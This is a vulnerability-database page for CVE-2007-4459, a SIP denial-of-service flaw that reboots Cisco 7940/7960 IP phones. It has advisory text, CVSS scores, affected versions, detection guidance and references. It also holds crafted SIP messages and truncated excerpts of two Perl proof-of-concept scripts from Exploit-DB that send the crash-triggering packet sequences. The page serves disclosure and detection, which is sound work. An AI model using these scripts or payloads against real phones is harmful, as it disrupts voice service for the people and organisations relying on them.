CVE-2007-4459
published 2007-08-21CVE-2007-4459: Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8.7(0), allows remote attackers to cause a denial of service (device…
PriorityP431high7.1CVSS 2.0
AVNACMAuNCNINAC
EXPLOIT
EPSS
13.99%
96.1th percentile
Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8.7(0), allows remote attackers to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | voip_phone_cp-7940 | <= 8.70 | — |
| cisco | voip_phone_cp-7940 | — | — |
| cisco | voip_phone_cp-7940 | — | — |
| cisco | voip_phone_cp-7940 | — | — |
| cisco | voip_phone_cp-7940 | — | — |
| cisco | voip_phone_cp-7960 | <= 8.70 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandINVITE sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: [email protected]\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n↗
commandOPTIONS sip:<user>@<target> SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: [email protected]\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n↗
commandOPTIONS sip:<user>@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP <src>;rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01@<src>\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n↗
commandINVITE sip:invaliduser@<target> SIP/2.0\r\nVia: SIP/2.0/UDP <src>;branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08@<src>\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286↗
- →Detect the exploit's characteristic sequence: an INVITE with a tab character (\t) in the Via header followed by OPTIONS messages sharing the same Call-ID, which is the 3-message variant trigger. ↗
- →Flag SIP INVITE or OPTIONS messages addressed to 'invaliduser' or using 'invalidURL' as the Request-URI host, as these are explicit exploit markers in the 10-message PoC. ↗
- →Alert on multiple SIP INVITE/OPTIONS messages sent in rapid succession (within ~45 seconds) to the same Cisco IP Phone target over UDP, especially when Call-IDs are reused across different transaction types. ↗
- →Monitor for SIP INVITE messages with a To: header that includes a 'tag=' parameter on initial requests (tag in To is only valid in responses/re-INVITEs), as seen in the 3-message PoC — this is a malformed SIP indicator. ↗
- →Scope detection to the Voice VLAN; the advisory explicitly states the attacker must have access to the voice VLAN network segment where affected devices reside. ↗
- ·Only Cisco 7940 and 7960 IP Phones running firmware version 8.6 and prior are vulnerable; firmware version 8.7 contains the fix and is not affected. ↗
- ·CVE-2007-5583 is a distinct but related vulnerability affecting the same device (Cisco IP Phone 7940 firmware P0S3-08-7-00) triggered specifically by SIP INVITE Request-URIs lacking a username — do not conflate detection signatures for the two CVEs. ↗
- ·The vulnerability is a state management bug — the phone corrupts its state table when processing the specific SIP message sequence, resulting in a crash and reboot rather than arbitrary code execution. ↗
CVSS provenance
nvdv2.07.1HIGHAV:N/AC:M/Au:N/C:N/I:N/A:C
vendor_cisco7.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Cisco
Cisco IP Phone Session Initiation Protocol Denial of Service Vulnerability
vendor_cisco·2007-08-21·CVSS 7.1
CVE-2007-4459 [HIGH] CWE-399 Cisco IP Phone Session Initiation Protocol Denial of Service Vulnerability
Cisco IP Phone Session Initiation Protocol Denial of Service Vulnerability
Cisco 7940 and 7960 IP Phones with firmware versions 8.6 and prior contain a vulnerability when handling a series of SIP messages that could allow an attacker on the Voice VLAN to cause the phone to fail and restart.
This vulnerability exists due to insufficient handling of certain sets of malformed SIP messages that are sent to affected devices. An unauthenticated, remote attacker with access to the voice VLAN could exploit this vulnerability by sending a series of malicious SIP messages to an affected device. When a device processes these messages, the device may fail and restart. An exploit could result in a denial of service condition.
Exploit code is available.
Cisco confirmed this vulnerability, and updated s
GHSA
GHSA-r3r7-8q5v-779v: Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8
ghsa_unreviewed·2022-05-01
CVE-2007-4459 [HIGH] CWE-20 GHSA-r3r7-8q5v-779v: Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8
Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware before 8.7(0), allows remote attackers to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.
GHSA
GHSA-mp26-cr2x-v76m: Cisco IP Phone 7940 with firmware P0S3-08-7-00 allows remote attackers to cause a denial of service ("486 Busy" responses or device reboot) via a sequ
ghsa_unreviewed·2022-05-01·CVSS 7.1
CVE-2007-5583 [HIGH] CWE-119 GHSA-mp26-cr2x-v76m: Cisco IP Phone 7940 with firmware P0S3-08-7-00 allows remote attackers to cause a denial of service ("486 Busy" responses or device reboot) via a sequ
Cisco IP Phone 7940 with firmware P0S3-08-7-00 allows remote attackers to cause a denial of service ("486 Busy" responses or device reboot) via a sequence of SIP INVITE transactions in which the Request-URI lacks a user name, a different vulnerability than CVE-2007-4459.
No detection rules found.
Exploit-DB
Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service
exploitdb·2007-08-21
CVE-2007-4459 Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service
Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service
---
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[3]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n";
$socket
Exploit-DB
Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service
exploitdb·2007-08-21
CVE-2007-4459 Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service
Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service
---
#!/usr/bin/perl
use IO::Socket::INET;
die "Usage $0 " unless ($ARGV[2]);
$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],
Proto=>'udp',
PeerAddr=>$ARGV[0]);
$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";;
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";
$socket->send($msg);
sleep(1);
$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branc
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065401.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065402.htmlhttp://secunia.com/advisories/26547http://securityreason.com/securityalert/3042http://securitytracker.com/id?1018591http://www.cisco.com/warp/public/707/cisco-sr-20070821-sip.shtmlhttp://www.osvdb.org/36695http://www.securityfocus.com/bid/25378http://www.vupen.com/english/advisories/2007/2928https://exchange.xforce.ibmcloud.com/vulnerabilities/36125http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065401.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065402.htmlhttp://secunia.com/advisories/26547http://securityreason.com/securityalert/3042http://securitytracker.com/id?1018591http://www.cisco.com/warp/public/707/cisco-sr-20070821-sip.shtmlhttp://www.osvdb.org/36695http://www.securityfocus.com/bid/25378http://www.vupen.com/english/advisories/2007/2928https://exchange.xforce.ibmcloud.com/vulnerabilities/36125
2007-08-21
Published